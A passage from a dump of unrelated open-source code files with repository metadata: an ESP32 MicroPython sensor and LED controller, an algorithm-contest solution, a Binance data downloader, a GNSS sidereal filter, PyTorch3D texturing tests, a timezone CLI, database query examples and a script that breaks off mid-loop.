全彩RGB灯 供电脚不够接的话,可以接gpio2供电,跟板载LED电平一致\n DHT22\n功能:\n BlinkerAPP远程获取DHT22温湿度数据、远程控制RGB颜色亮度、oled本地实时显示时间+温度和湿度。\n'''\nfrom dht import DHT22\nfrom machine import Pin,PWM,SoftSPI,Timer\nfrom Blinker.Blinker import Blinker, BlinkerButton, BlinkerNumber, BlinkerRGB\nfrom Blinker.BlinkerDebug import *\nfrom ssd1306 import SSD1306_SPI\n\n\n#软SPI,初始化oled \nspi = SoftSPI(baudrate=80000000, polarity=0, phase=0, sck=Pin(18,Pin.OUT), mosi=Pin(23,Pin.OUT), miso=Pin(33)) #sck(D0)=18 mosi(D1)=23 miso=unused\noled = SSD1306_SPI(128, 64, spi, Pin(4),Pin(5), Pin(32)) #4=DC 5=RST unused=CS\n\n#初始化RGB灯珠引脚,复用PWM,设置频率\nled_r = Pin(25, Pin.OUT)\nled_b = Pin(26, Pin.OUT)\nled_g = Pin(27, Pin.OUT)\npwm_led_r = PWM(led_r)\npwm_led_r.freq(1000)\npwm_led_g = PWM(led_g)\npwm_led_g.freq(1000)\npwm_led_b = PWM(led_b)\npwm_led_b.freq(1000)\n\ndht = DHT22(Pin(13))\t#设置DHT22引脚\n\np2 = Pin(2, Pin.OUT)\t#板载led\n\n\nauth = 'Your Device Secret Key' #Blinker设备秘钥\nssid = 'Your WiFi network SSID or name' #SSID:WiFi名称\npswd = 'Your WiFi network WPA password or WEP key' #WIFI 密码\n\n\n\n#Debug\nBLINKER_DEBUG.debugAll()\n#初始化硬件Wifi接入\nBlinker.mode('BLINKER_WIFI')\nBlinker.begin(auth, ssid, pswd)\n#数字组件, 用于发送数据到APP/显示数字数据\nHUMI = BlinkerNumber('humi')\nTEMP = BlinkerNumber('temp')\n#按键组件在App中可以设置 按键/开关/自定义 三种模式\nbutton1 = BlinkerButton('led0')\n#颜色组件, 用于读取/设置RGB及亮度值\nrgb1 = BlinkerRGB(\"RGBKey\")\n\nhumi_read = 0\t#读取湿度\ntemp_read = 0\t#读取温度\n\ndef heartbeat_callback():\n \"\"\"心跳包回调函数,用户在线时每分钟触发一次\"\"\"\n #清屏\n oled.fill(0)\n #dht22测量一次\n dht.measure()\n temp_read = dht.temperature()\t#读取温度\n humi_read = dht.humidity()\t\t#读取湿度\n \n #时间+温度+湿度\n time_tex = str(Blinker.year())+'-'+str(Blinker.month())+'-'+str(Blinker.mday())+' '+str(Blinker.hour())+':'+('0'+str(Blinker.minute()))[-2:]\n t_tex = \"T:\"+str(temp_read)+\"C\"\n h_tex = \"H:\"+str(humi_read)[:4]+'%'\n #oled显示时间+温度+湿度\n oled.text(time_tex,0,6)\n oled.text(t_tex, 40, 16)\n oled.text(h_tex, 40, 26)\n oled.show()\t\t\t#OLED显示\n BLINKER_LOG('||Humidity:',humi_read,\"||Temperature:\",temp_read,\"||\")\t#串口Blinker输出日志\n HUMI.print(humi_read)\t#发送湿度数据到APP/显示数字数据\n TEMP.print(temp_read)\t#发送温度数据到APP/显示数字数据\n\n\ndef button1_callback(state):\n '''按键回调(内置led的开关)'''\n BLINKER_LOG('get button state: ', state)\t#串口Blinker输出日志\n button1.print(state)\t\t#发送button1状态\n p2.value(1-p2.value())\t\t#按键翻转电平\n #根据电平设置app按键的图标\n if(p2.value()):\n button1.icon(\"fad fa-siren\")\n button1.text(\"Turn ON\") \n else:\n button1.icon(\"fad fa-siren-on\")\n button1.text(\"Turn OFF\")\n \n\ndef rgb1_callback(r_value, g_value, b_value, bright_value):\n \"\"\"根据RGB组件返回值设置R/G/B占空比\"\"\"\n \"\"\"无亮度情况\"\"\"\n #pwm_led_r.duty(1023 - int(r_value / 255 * 1023))\n #pwm_led_g.duty(1023 - int(g_value / 255 * 1023))\n #pwm_led_b.duty(1023 - int(b_value / 255 * 1023)) \n \"\"\"有亮度情况\"\"\"\n pwm_led_r.duty(1023 - int(r_value * bright_value* 1023 / 65025 ))\n pwm_led_g.duty(1023 - int(g_value * bright_value* 1023 / 65025 ))\n pwm_led_b.duty(1023 - int(b_value * bright_value* 1023 / 65025 ))\n \n\n#定时器0回调函数\ndef mycallback(callback_timer):\n \"\"\"\"实现Oled屏本地实时显示时间/温度/湿度信息\"\"\"\n oled.fill(0)\n #dht22测量一次\n dht.measure()\n temp_read = dht.temperature()\t#读取温度\n humi_read = dht.humidity()\t\t#读取湿度\n try:\n ntptime.settime()\n except:\n pass\n time_tex = time.localtime()\n time_tex = '%d-%d-%d %d:%02d'%(time_tex[0],time_tex[1],time_tex[2],time_tex[3],time_tex[4])\n #时间+温度+湿度\n t_tex = \"T:\"+str(temp_read)+\"C\"\n h_tex = \"H:\"+str(humi_read)[:4]+'%'\n #oled显示时间+温度+湿度\n oled.text(time_tex,0,6)\n oled.text(t_tex, 40, 16)\n oled.text(h_tex, 40, 26)\n oled.show()\t\t\t#OLED显示\n \n\n\nif __name__ == '__main__':\n #注册回调函数,当有设备收到APP发来的数据时会调用对应的回调函数\n rgb1.attach(rgb1_callback)\n button1.attach(button1_callback)\n Blinker.attachHeartbeat(heartbeat_callback)\n \n tim0 = Timer(0)\n tim0.init(period=60000, mode=Timer.PERIODIC, callback=mycallback) #周期为1分钟,无限执行。\n while True:\n Blinker.run()\n \n \n\n\n\n\n\n\n\n","repo_name":"xlft/Esp32_mpyBlinker_example","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17154066535","text":"N, L = map(int,input().split())\nworld= []\nfor i in range(N):\n world.append(list(map(int,input().split())))\ndef slide(way):\n for j in range(1,N):\n if abs(way[j] - way[j-1]) > 1:\n return False\n if way[j] - way[j-1] == 1:\n for k in range(1,L+1):\n if (j-k) < 0 or way[j-1] != way[j-k] or used[j-k]:\n return False\n if way[j-1] == way[j-k]:\n used[j-k] = True\n elif way[j] - way[j-1] == -1:\n for k in range(1,L+1):\n if (j+k) > N or way[j] != way[j+k-1] or used[j+k-1]:\n return False \n if way[j] == way[j+k-1]:\n used[j+k-1] = True\n return True\n\nans = 0\nfor i in range(N):\n used = [False] * N \n if slide([world[i][j] for j in range(N)]):\n ans +=1\nfor i in range(N):\n used = [False] * N\n if slide([world[j][i] for j in range(N)]):\n ans += 1\nprint(ans)\n \n\n\n\n\n","repo_name":"da2inee/Algorithm","sub_path":"Implementation/BOJ14890경사로.py","file_name":"BOJ14890경사로.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18613854281","text":"import requests\nimport zipfile\nimport os\n# https://data.binance.vision/data/spot/daily/klines/BTCBUSD/1m/BTCBUSD-1m-2023-01-30.zip\nurl_template = \"https://data.binance.vision/data/spot/daily/klines/BTCBUSD/1h/BTCBUSD-1m-{}-{:02d}-{:02d}.zip\"\n\n# Define the date range for which to download the zip files\nstart_year = 2021\nstart_month = 3\nstart_day = 1\nend_year = 2022\nend_month = 12\nend_day = 31\n\n# Loop through the date range to download the zip files\nfor year in range(start_year, end_year + 1):\n for month in range(start_month, end_month + 1):\n for day in range(start_day, end_day + 1):\n date = f\"{year}-{month}-{day}\"\n url = url_template.format(year, month, day)\n print(url)\n response = requests.get(url)\n if response.status_code == 200:\n # Save the zip file to the current directory\n with open(f\"BTCBUSD-1m-{date}.zip\", \"wb\") as f:\n f.write(response.content)\n # Extract the contents of the zip file\n with zipfile.ZipFile(f\"BTCBUSD-1m-{date}.zip\", \"r\") as z:\n z.extractall()\n # Delete the zip file after extraction\n os.remove(f\"BTCBUSD-1m-{date}.zip\")\n print(f\"Successfully downloaded and extracted BTCBUSD-1m-{date}.zip\")\n else:\n print(f\"Unable to download BTCBUSD-1m-{date}.zip, status code: {response.status_code}\")\n","repo_name":"markjconnolly/precision_crypto","sub_path":"code/scrape_BTC.py","file_name":"scrape_BTC.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20892499420","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport scipy.stats as stats\nimport scipy.signal as signal\nimport datetime as datetime\nimport matplotlib.pyplot as plt\nimport obspy.signal.cross_correlation as xcorr\n\ndef filter(date, time, north, east, up, eq, showme=False):\n \"\"\"\n @author: Cedric Twardzik\n @contact: cedric.twardz(at)gmail.com\n @inputs: date [type datetime]: dates of the positions\n time [type float]: times of the positions (s)\n north [type float]: position in the north component\n east [type float]: position in the east component\n up [type float]: position in the vertical component\n eq [type datetime]: date of the mainshock \n showme [type logical]: show the stacks and the filter \n \"\"\"\n\n # Find the sampling interval\n dt = time[1] - time[0]\n\n # Remove the coseismic offset\n ib = date < eq\n ia = date > eq\n offset_n = north[ia][0] - north[ib][-1]\n offset_e = east [ia][0] - east [ib][-1]\n offset_u = up [ia][0] - up [ib][-1]\n north[ia] -= offset_n\n east [ia] -= offset_e\n up [ia] -= offset_u\n\n # Create the full time series\n full_time = np.arange(time[0], time[-1]+dt, dt)\n full_date = np.array([date[0] + datetime.timedelta(seconds=i*dt) for i in range(full_time.size)])\n full_north = np.full(full_time.size, np.nan)\n full_east = np.full(full_time.size, np.nan)\n full_up = np.full(full_time.size, np.nan)\n ij, i, j = np.intersect1d(time, full_time, assume_unique=True, return_indices=True)\n full_north[j] = north[i]\n full_east [j] = east [i]\n full_up [j] = up [i]\n\n # Sidereal day (Choi et al. 2004)\n sidereal_shift = datetime.datetime(2000, 1, 2, 0, 0, 0) - datetime.datetime(2000, 1, 1, 23, 56, 4, 0)\n sidereal_shift = np.int(sidereal_shift.total_seconds()/dt + 0.5001)\n\n # Maximum sidereal shift allowed\n ndays = (full_date[-1] - full_date[0]).days\n sidereal_shift *= (ndays*4)\n\n # Remove the gaps in the time series using simple linear interpolation\n nans = np.isnan(full_north)\n full_north[nans] = np.interp(full_time[nans], full_time[~nans], full_north[~nans])\n full_east [nans] = np.interp(full_time[nans], full_time[~nans], full_east [~nans])\n full_up [nans] = np.interp(full_time[nans], full_time[~nans], full_up [~nans])\n\n # Extract the first day\n tstart = full_date[0]\n tstop = full_date[0] + datetime.timedelta(days=1)\n index = (tstart <= full_date) & (full_date < tstop)\n stack_north = full_north[index] * full_north[index].std()\n stack_east = full_east [index] * full_east [index].std()\n stack_up = full_up [index] * full_up [index].std()\n stack_time = full_time [index]\n stack_size = stack_time.size\n ntrace_north = full_north[index].std()\n ntrace_east = full_east [index].std()\n ntrace_up = full_up [index].std()\n \n # Show the stacks\n if showme:\n plt.close()\n fig, ax = plt.subplots(3, 1, sharex='col')\n ax[0].plot(stack_time, stack_north/ntrace_north, 'k-', lw=1.0, alpha=0.5)\n ax[1].plot(stack_time, stack_east /ntrace_east , 'k-', lw=1.0, alpha=0.5)\n ax[2].plot(stack_time, stack_up /ntrace_up , 'k-', lw=1.0, alpha=0.5)\n\n # Initialize the day counter\n iday = 1\n\n # Stack the days before the earthquake\n while True:\n\n # Extract the following day\n tstart = tstop\n tstop = tstart + datetime.timedelta(days=1)\n index = (tstart-datetime.timedelta(hours=1.0) <= full_date) & (full_date < tstop+datetime.timedelta(hours=1.0))\n i0 = np.int(3600.0/dt + 0.5001)\n\n # Ensure that we are not getting any data from after the mainchock\n if np.any(full_date[index] >= eq): break\n\n # Select the relevant data\n n = full_north[index]\n e = full_east [index]\n u = full_up [index]\n\n # Cross-correlation between the current day and the stack (position)\n #cc_north = xcorr.correlate(stack_north/ntrace_north, n, stack_size)\n #cc_east = xcorr.correlate(stack_east /ntrace_east , e, stack_size)\n #cc_up = xcorr.correlate(stack_up /ntrace_up , u, stack_size)\n\n # Cross-correlation between the current day and the stack (velocity)\n cc_north = xcorr.correlate(np.diff(stack_north/ntrace_north), np.diff(n), stack_size-1)\n cc_east = xcorr.correlate(np.diff(stack_east /ntrace_east ), np.diff(e), stack_size-1)\n cc_up = xcorr.correlate(np.diff(stack_up /ntrace_up ), np.diff(u), stack_size-1)\n\n # Find the optimal shift to maximize the cross-correlation\n shift_north, ccmax_north = xcorr.xcorr_max(cc_north, abs_max=False)\n shift_east , ccmax_east = xcorr.xcorr_max(cc_east , abs_max=False)\n shift_up , ccmax_up = xcorr.xcorr_max(cc_up , abs_max=False)\n\n # Show the stacks\n if showme:\n ax[0].plot(stack_time, n[i0-shift_north:i0+stack_size-shift_north], 'k-', lw=1.0, alpha=0.5)\n ax[1].plot(stack_time, e[i0-shift_east :i0+stack_size-shift_east ], 'k-', lw=1.0, alpha=0.5)\n ax[2].plot(stack_time, u[i0-shift_up :i0+stack_size-shift_up ], 'k-', lw=1.0, alpha=0.5)\n\n # Add the trace to the stack\n stack_north += n[i0-shift_north:i0+stack_size-shift_north] * n[i0-shift_north:i0+stack_size-shift_north].std()\n stack_east += e[i0-shift_east :i0+stack_size-shift_east ] * e[i0-shift_east :i0+stack_size-shift_east ].std()\n stack_up += u[i0-shift_up :i0+stack_size-shift_up ] * u[i0-shift_up :i0+stack_size-shift_up ].std()\n\n # Update the normalization factor\n ntrace_north += n[i0-shift_north:i0+stack_size-shift_north].std()\n ntrace_east += e[i0-shift_east :i0+stack_size-shift_east ].std()\n ntrace_up += u[i0-shift_up :i0+stack_size-shift_up ].std()\n\n # Update the day counter\n iday += 1\n\n # Normalize the final stack\n stack_north /= ntrace_north\n stack_east /= ntrace_east\n stack_up /= ntrace_up\n \n # Show the final stack\n if showme:\n ax[0].plot(stack_time, stack_north, 'r-', lw=2.0, alpha=0.9)\n ax[1].plot(stack_time, stack_east , 'r-', lw=2.0, alpha=0.9)\n ax[2].plot(stack_time, stack_up , 'r-', lw=2.0, alpha=0.9)\n plt.show()\n\n # Initialize the sidereal filter\n filter_date = full_date.copy()\n filter_time = full_time.copy()\n filter_north = np.full(filter_time.size, np.nan)\n filter_east = np.full(filter_time.size, np.nan)\n filter_up = np.full(filter_time.size, np.nan)\n\n # Initialize the day counter\n iday = 0\n\n # Build the sidereal filter\n while True:\n\n # Extract the relevant dates\n tstart = full_date[0] + datetime.timedelta(days=iday)\n tstop = full_date[0] + datetime.timedelta(days=iday+1)\n index = (tstart <= full_date) & (full_date < tstop)\n\n # Ensure we have a full date\n if index.sum() != 2880: break\n\n # Remove the log-trend before cross-correlation\n n = full_north[index]\n e = full_east [index]\n u = full_up [index]\n\n # Cross-correlation between the current day and the stack (position)\n #cc_north = xcorr.correlate(stack_north, n, stack_size)\n #cc_east = xcorr.correlate(stack_east , e, stack_size)\n #cc_up = xcorr.correlate(stack_up , u, stack_size)\n\n # Cross-correlation between the current day and the stack (velocity)\n cc_north = xcorr.correlate(np.diff(stack_north), np.diff(n), stack_size-1)\n cc_east = xcorr.correlate(np.diff(stack_east ), np.diff(e), stack_size-1)\n cc_up = xcorr.correlate(np.diff(stack_up ), np.diff(u), stack_size-1)\n\n # Find the optimal shift to maximize the cross-correlation\n shift_north, ccmax_north = xcorr.xcorr_max(cc_north, abs_max=False)\n shift_east , ccmax_east = xcorr.xcorr_max(cc_east , abs_max=False)\n shift_up , ccmax_up = xcorr.xcorr_max(cc_up , abs_max=False)\n\n # Insert the stack\n filter_north[index] = np.roll(stack_north * signal.tukey(stack_size, 0.05), -shift_north)\n filter_east [index] = np.roll(stack_east * signal.tukey(stack_size, 0.05), -shift_east )\n filter_up [index] = np.roll(stack_up * signal.tukey(stack_size, 0.05), -shift_up )\n\n # Update the day counter\n iday += 1\n\n # Remove the mean of the filter\n filter_north -= np.nanmean(filter_north)\n filter_east -= np.nanmean(filter_east )\n filter_up -= np.nanmean(filter_up )\n \n # Remove the sidereal filter\n full_north -= filter_north\n full_east -= filter_east\n full_up -= filter_up\n\n # Get the relevant part of the filter\n ij, i, j = np.intersect1d(time, full_time, assume_unique=True, return_indices=True)\n north[i] = full_north[j]\n east [i] = full_east [j]\n up [i] = full_up [j]\n\n # Add the coseismic offset\n north[ia] += offset_n\n east [ia] += offset_e\n up [ia] += offset_u\n\n # All done\n return north, east, up\n","repo_name":"cedrictwardz/SiderealFilter","sub_path":"sidereal.py","file_name":"sidereal.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21264744451","text":"import openpyxl\nimport random\nfrom openpyxl import Workbook, load_workbook\nimport glob\nimport json\n\n\ndef D3_wellness_dialog_for_autoregressive():\n folder_path = \"./TK_data/TT_data\"\n output_path = \"./TK_data/T0_data/T0_data.txt\"\n\n output_file = open(output_path, 'w', encoding='utf-8')\n #output_file.close()\n #output_file = open(output_path, 'a', encoding='utf-8')\n\n\n\n for file_path in glob.glob(folder_path + \"/*.txt\"):\n print(\"\\n\\n\\n {} \\n\\n\\n\".format(file_path))\n file = open(file_path, 'r', encoding='utf-8')\n ques_lines = file.readline()\n while True:\n answ_lines = file.readline()\n if not answ_lines:\n break\n #print(\"\\nTK:{}\\n\".format(ques_lines[:-1]))\n #print(\"\\nTK:{}\\n\".format(answ_lines[:-1]))\n output_file.write(ques_lines[:-1] + \" \" + answ_lines[:-1] + \"\\n\")\n ques_lines = answ_lines \n \n file.close()\n output_file.write(\"\\n\")\n\n output_file.close()\n\n\n\nif __name__ == \"__main__\":\n D3_wellness_dialog_for_autoregressive()\n","repo_name":"tk1star2/tk_kogpt2_memorable","sub_path":"STEP1_data_generation_T0.py","file_name":"STEP1_data_generation_T0.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31555116101","text":"\"\"\"\nSub command to show datetime from saved timezones.\n\"\"\"\nimport sys\nfrom typing import List, Union\n\nimport click\n\nfrom timezones_cli.utils import check_config as check_configuration\nfrom timezones_cli.utils import console, get_local_time, get_system_time\n\n\n@click.command()\n@click.option(\n \"--toggle\",\n \"-t\",\n help=\"Toggle for 24 hours format\",\n type=bool,\n default=False,\n is_flag=True,\n)\ndef show(toggle: bool):\n \"\"\"\n Show time based on the defaults at .tz-cli file.\n\n $ tz show\n \"\"\"\n check_config: Union[List, bool] = check_configuration()\n\n if not check_config:\n console.print(\n \"File is empty or No configuration file is present in your system.:x:\\n\",\n style=\"bold red\",\n )\n console.print(\n \"Use `tz add` to create and add timezone to your config file.:memo:\\n\",\n style=\"bold green\",\n )\n\n console.print(\n f\"Your system datetime is: {get_system_time()}\",\n style=\"bold yellow\",\n )\n sys.exit()\n\n return get_local_time(check_config, toggle=toggle)\n","repo_name":"yankeexe/timezones-cli","sub_path":"timezones_cli/commands/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"} +{"seq_id":"10233030098","text":"import unittest\nimport torch\nimport torch.nn.functional as F\n\nfrom pytorch3d.renderer.mesh.rasterizer import Fragments\nfrom pytorch3d.renderer.mesh.texturing import (\n _clip_barycentric_coordinates,\n interpolate_face_attributes,\n interpolate_texture_map,\n interpolate_vertex_colors,\n)\nfrom pytorch3d.structures import Meshes, Textures\n\nfrom common_testing import TestCaseMixin\nfrom test_meshes import TestMeshes\n\n\nclass TestTexturing(TestCaseMixin, unittest.TestCase):\n def test_interpolate_attributes(self):\n \"\"\"\n This tests both interpolate_vertex_colors as well as\n interpolate_face_attributes.\n \"\"\"\n verts = torch.randn((4, 3), dtype=torch.float32)\n faces = torch.tensor([[2, 1, 0], [3, 1, 0]], dtype=torch.int64)\n vert_tex = torch.tensor(\n [[0, 1, 0], [0, 1, 1], [1, 1, 0], [1, 1, 1]], dtype=torch.float32\n )\n tex = Textures(verts_rgb=vert_tex[None, :])\n mesh = Meshes(verts=[verts], faces=[faces], textures=tex)\n pix_to_face = torch.tensor([0, 1], dtype=torch.int64).view(1, 1, 1, 2)\n barycentric_coords = torch.tensor(\n [[0.5, 0.3, 0.2], [0.3, 0.6, 0.1]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n expected_vals = torch.tensor(\n [[0.5, 1.0, 0.3], [0.3, 1.0, 0.9]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=barycentric_coords,\n zbuf=torch.ones_like(pix_to_face),\n dists=torch.ones_like(pix_to_face),\n )\n texels = interpolate_vertex_colors(fragments, mesh)\n self.assertTrue(torch.allclose(texels, expected_vals[None, :]))\n\n def test_interpolate_attributes_grad(self):\n verts = torch.randn((4, 3), dtype=torch.float32)\n faces = torch.tensor([[2, 1, 0], [3, 1, 0]], dtype=torch.int64)\n vert_tex = torch.tensor(\n [[0, 1, 0], [0, 1, 1], [1, 1, 0], [1, 1, 1]],\n dtype=torch.float32,\n requires_grad=True,\n )\n tex = Textures(verts_rgb=vert_tex[None, :])\n mesh = Meshes(verts=[verts], faces=[faces], textures=tex)\n pix_to_face = torch.tensor([0, 1], dtype=torch.int64).view(1, 1, 1, 2)\n barycentric_coords = torch.tensor(\n [[0.5, 0.3, 0.2], [0.3, 0.6, 0.1]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=barycentric_coords,\n zbuf=torch.ones_like(pix_to_face),\n dists=torch.ones_like(pix_to_face),\n )\n grad_vert_tex = torch.tensor(\n [\n [0.3, 0.3, 0.3],\n [0.9, 0.9, 0.9],\n [0.5, 0.5, 0.5],\n [0.3, 0.3, 0.3],\n ],\n dtype=torch.float32,\n )\n texels = interpolate_vertex_colors(fragments, mesh)\n texels.sum().backward()\n self.assertTrue(hasattr(vert_tex, \"grad\"))\n self.assertTrue(torch.allclose(vert_tex.grad, grad_vert_tex[None, :]))\n\n def test_interpolate_face_attributes_fail(self):\n # 1. A face can only have 3 verts\n # i.e. face_attributes must have shape (F, 3, D)\n face_attributes = torch.ones(1, 4, 3)\n pix_to_face = torch.ones((1, 1, 1, 1))\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=pix_to_face[..., None].expand(-1, -1, -1, -1, 3),\n zbuf=pix_to_face,\n dists=pix_to_face,\n )\n with self.assertRaises(ValueError):\n interpolate_face_attributes(fragments, face_attributes)\n\n # 2. pix_to_face must have shape (N, H, W, K)\n pix_to_face = torch.ones((1, 1, 1, 1, 3))\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=pix_to_face,\n zbuf=pix_to_face,\n dists=pix_to_face,\n )\n with self.assertRaises(ValueError):\n interpolate_face_attributes(fragments, face_attributes)\n\n def test_interpolate_texture_map(self):\n barycentric_coords = torch.tensor(\n [[0.5, 0.3, 0.2], [0.3, 0.6, 0.1]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n dummy_verts = torch.zeros(4, 3)\n vert_uvs = torch.tensor(\n [[1, 0], [0, 1], [1, 1], [0, 0]], dtype=torch.float32\n )\n face_uvs = torch.tensor([[0, 1, 2], [1, 2, 3]], dtype=torch.int64)\n interpolated_uvs = torch.tensor(\n [[0.5 + 0.2, 0.3 + 0.2], [0.6, 0.3 + 0.6]], dtype=torch.float32\n )\n\n # Create a dummy texture map\n H = 2\n W = 2\n x = torch.linspace(0, 1, W).view(1, W).expand(H, W)\n y = torch.linspace(0, 1, H).view(H, 1).expand(H, W)\n tex_map = torch.stack([x, y], dim=2).view(1, H, W, 2)\n pix_to_face = torch.tensor([0, 1], dtype=torch.int64).view(1, 1, 1, 2)\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=barycentric_coords,\n zbuf=pix_to_face,\n dists=pix_to_face,\n )\n tex = Textures(\n maps=tex_map,\n faces_uvs=face_uvs[None, ...],\n verts_uvs=vert_uvs[None, ...],\n )\n meshes = Meshes(verts=[dummy_verts], faces=[face_uvs], textures=tex)\n texels = interpolate_texture_map(fragments, meshes)\n\n # Expected output\n pixel_uvs = interpolated_uvs * 2.0 - 1.0\n pixel_uvs = pixel_uvs.view(2, 1, 1, 2)\n tex_map = torch.flip(tex_map, [1])\n tex_map = tex_map.permute(0, 3, 1, 2)\n tex_map = torch.cat([tex_map, tex_map], dim=0)\n expected_out = F.grid_sample(tex_map, pixel_uvs, align_corners=False)\n self.assertTrue(\n torch.allclose(texels.squeeze(), expected_out.squeeze())\n )\n\n def test_clone(self):\n V = 20\n tex = Textures(\n maps=torch.ones((5, 16, 16, 3)),\n faces_uvs=torch.randint(size=(5, 10, 3), low=0, high=V),\n verts_uvs=torch.ones((5, V, 2)),\n )\n tex_cloned = tex.clone()\n self.assertSeparate(tex._faces_uvs_padded, tex_cloned._faces_uvs_padded)\n self.assertSeparate(tex._verts_uvs_padded, tex_cloned._verts_uvs_padded)\n self.assertSeparate(tex._maps_padded, tex_cloned._maps_padded)\n\n def test_to(self):\n V = 20\n tex = Textures(\n maps=torch.ones((5, 16, 16, 3)),\n faces_uvs=torch.randint(size=(5, 10, 3), low=0, high=V),\n verts_uvs=torch.ones((5, V, 2)),\n )\n device = torch.device(\"cuda:0\")\n tex = tex.to(device)\n self.assertTrue(tex._faces_uvs_padded.device == device)\n self.assertTrue(tex._verts_uvs_padded.device == device)\n self.assertTrue(tex._maps_padded.device == device)\n\n def test_extend(self):\n B = 10\n mesh = TestMeshes.init_mesh(B, 30, 50)\n V = mesh._V\n F = mesh._F\n tex = Textures(\n maps=torch.randn((B, 16, 16, 3)),\n faces_uvs=torch.randint(size=(B, F, 3), low=0, high=V),\n verts_uvs=torch.randn((B, V, 2)),\n )\n tex_mesh = Meshes(\n verts=mesh.verts_padded(), faces=mesh.faces_padded(), textures=tex\n )\n N = 20\n new_mesh = tex_mesh.extend(N)\n\n self.assertEqual(len(tex_mesh) * N, len(new_mesh))\n\n tex_init = tex_mesh.textures\n new_tex = new_mesh.textures\n\n for i in range(len(tex_mesh)):\n for n in range(N):\n self.assertClose(\n tex_init.faces_uvs_list()[i],\n new_tex.faces_uvs_list()[i * N + n],\n )\n self.assertClose(\n tex_init.verts_uvs_list()[i],\n new_tex.verts_uvs_list()[i * N + n],\n )\n self.assertAllSeparate(\n [\n tex_init.faces_uvs_padded(),\n new_tex.faces_uvs_padded(),\n tex_init.verts_uvs_padded(),\n new_tex.verts_uvs_padded(),\n tex_init.maps_padded(),\n new_tex.maps_padded(),\n ]\n )\n with self.assertRaises(ValueError):\n tex_mesh.extend(N=-1)\n\n def test_clip_barycentric_coords(self):\n barycentric_coords = torch.tensor(\n [[1.5, -0.3, -0.2], [1.2, 0.3, -0.5]], dtype=torch.float32\n )\n expected_out = torch.tensor(\n [[1.0, 0.0, 0.0], [1.0 / 1.3, 0.3 / 1.3, 0.0]], dtype=torch.float32\n )\n clipped = _clip_barycentric_coordinates(barycentric_coords)\n self.assertTrue(torch.allclose(clipped, expected_out))\n# Helpful comments below.# Helpful comments below.# Helpful comments below.# Helpful comments below.# Helpful comments below.","repo_name":"Lynn-Vang42/demo-data","sub_path":"test_texturing.py","file_name":"test_texturing.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34214439423","text":"#!/usr/bin/env python3\n\nimport psycopg2 as pg\nimport psycopg2.extras\n\nconn = pg.connect(database='france')\n\ncur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n# Query as a string\nquery = \"SELECT name, code FROM regions ORDER BY name ASC\"\n\n# Execute the query\ncur.execute(query)\n\n# Can see the number of rows returned\nprint(\"number of regions: %s\" % cur.rowcount)\n\n# Loop over each row\nfor row in cur.fetchall():\n\n # Access by column name in dict\n print(\"%s [%s]\" % (row['name'], row['code']))\n\n# prompt for region code\nregion_code = input(\"Enter region code: \")\n\n# look for departments in the region\nquery = \"select departments.code as department_code, departments.name as department_name, count(towns.name) as n_towns from departments join towns on towns.department=departments.code where departments.region LIKE %(region_code)s group by departments.name, departments.code ORDER BY departments.name ASC\"\nparameters = { 'region_code': region_code }\ncur.execute(query, parameters )\n\nprint(\"number of departments: %s\" % cur.rowcount)\n\nfor row in cur.fetchall():\n print('%s. %s [%s]' % (row['department_code'], row['department_name'], row['n_towns']))\n\n# Close the cursor and connection\ncur.close()\nconn.close()\n","repo_name":"peadargrant/data_architecture","sub_path":"t10_connectivity/.sln/connectivity_solution.py","file_name":"connectivity_solution.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3960219095","text":"from pathlib import Path\nimport glob\nimport pandas as pd\nimport os\nimport sys\nimport xml.etree.ElementTree as ET\nimport datetime\nimport requests\n\n#-------------------------------------------\n#begin\n#-------------------------------------------\nprint('\\n')\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\nprint(__file__)\nprint(datetime.datetime.now())\nprint()\n\n#-------------------------------------------\n#初期設定\n#-------------------------------------------\nHOME_DIR_NAME = 'CATPEC'\nINPUT_FILE_PREFIX = 'remove_garbage_all_subset_'\nINPUT_FILE_SUFFIX = '.csv'\nOUTPUT_FILE_PREFIX = 'summaraized_all_subset_'\nOUTPUT_FILE_SUFFIX = '.csv'\nOUTPUT_ENCODING = 'UTF-8'\n\n#-------------------------------------------\n#関数\n#-------------------------------------------\ndef get_home_dir(dir_name):\n path = Path(os.path.dirname(__file__))\n _index = 0\n while True:\n if path.parents[_index].name == dir_name:\n home_dir = path.parents[_index]\n break\n _index += 1\n return home_dir\n\ndef select_file(path_regex):\n input_files = glob.glob(path_regex)\n\n if len(input_files) == 0:\n print('error:output file can not found.')\n return ''\n\n elif len(input_files) == 1:\n return input_files[0]\n\n else:\n for _index, output_file in 